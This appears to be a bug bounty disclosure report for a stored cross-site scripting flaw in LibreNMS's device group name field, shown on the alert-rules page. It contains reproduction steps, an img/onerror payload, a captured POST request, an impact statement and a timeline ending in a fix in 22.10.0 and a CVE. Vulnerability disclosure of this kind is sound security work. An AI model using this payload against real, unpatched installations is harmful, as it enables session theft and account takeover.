librenms alert-rules Stored XSS in librenms/librenms

Valid

Reported on

Apr 13th 2022


Description

Please enter a description of the vulnerability. 1 . Go to http://[SERVER]/device-group and Create New-device Group

2 . Input [Name] parameter following XSS payload and save
[<img src=x onerror=alert(1);>]
payload 1

3 . Go to http://[SERVER]/alert-rules and add Rule. You can choose the Device group that contains XSS payload
payload 2

4 . Save and return http://[SERVER]/alert-rules
payload 3

5 . You can find out the Javascript executed

PCAP

POST /device-groups HTTP/1.1
Host: 192.168.0.4
Connection: keep-alive
Content-Length: 524
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.4
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.4/device-groups/create
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6InQ1K1ZZMm9DZ0VPQlh4RkJLcnR3elE9PSIsInZhbHVlIjoiaERTQ3pTNmJzK3lqdzZ1TkFkejhmeW9HZXcvaWVuODVwYWZZV2QxUHNyazRYdDY2VGJRSUxoSHJIbnEySisyMUptK2dpaU1hdE1QSDREMzJwYjRDMThVVk52ejNiblh1OFNWUGlMaUUvQlhKRzlLd1Y5Z2VIbWFieWpueDhOYmIiLCJtYWMiOiI0Y2JhZDI2ZGJkNjVmMmJmZjkwZmI2NTE0NTQzZDIxYmIxNDUxZjZmZTUyOTdiMmM1YWEwN2Q0ZmQxOGVlYmExIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IllnWmx0SlpoUjR2c3Z2Z2JlVDRwWmc9PSIsInZhbHVlIjoidnN4b0VBQU1pUVB1MGtIQVlyWkVNaVBOSGtIOFc3VHVDcjdVN1RuZHhjdCtGQVV2MXltSVEybk9MaERYb01DNUhyMFNSUjVxcm9WbSttQmJqbGtMOUV5WWN6SmhBYk44TU1HN2UzZjd4eVJTZmZoYURTeGdQQzRGMHJNcEYrR3kiLCJtYWMiOiJjODA2NGU2ZDZjNTg3NjM4ZWQ2ZjgwODQ4Y2Q1ZDYyZjM3ZTkxMmIxMzc1ZDkzZWUwOGIxYmI5YWMwYTg1NjBkIiwidGFnIjoiIn0%3D

_token=lTMObTvhduJCjTDkvmk1I3u4Vuti8C0OGafrlL8J&name=%3Cimg+src%3Dy+onerror%3Dalert%281%29%3B%3E&desc=111&type=dynamic&builder_rule_0_filter=access_points.accesspoint_id&builder_rule_0_operator=equal&builder_rule_0_value_0=111&rules=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22equal%22%2C%22value%22%3A%22111%22%7D%5D%2C%22valid%22%3Atrue%7D

Impact

It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

We are processing your report and will contact the librenms team within 24 hours. 8 months ago
We have contacted a member of the librenms team and are waiting to hear back 8 months ago
We have sent a follow up to the librenms team. We will try again in 7 days. 7 months ago
We have sent a second follow up to the librenms team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the librenms team. This report is now considered stale. 7 months ago
Tony Murray validated this vulnerability a month ago
dnr6419 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tony Murray marked this as fixed in 22.10.0 with commit d86cbc a month ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Tony Murray published this vulnerability 9 days ago
to join this conversation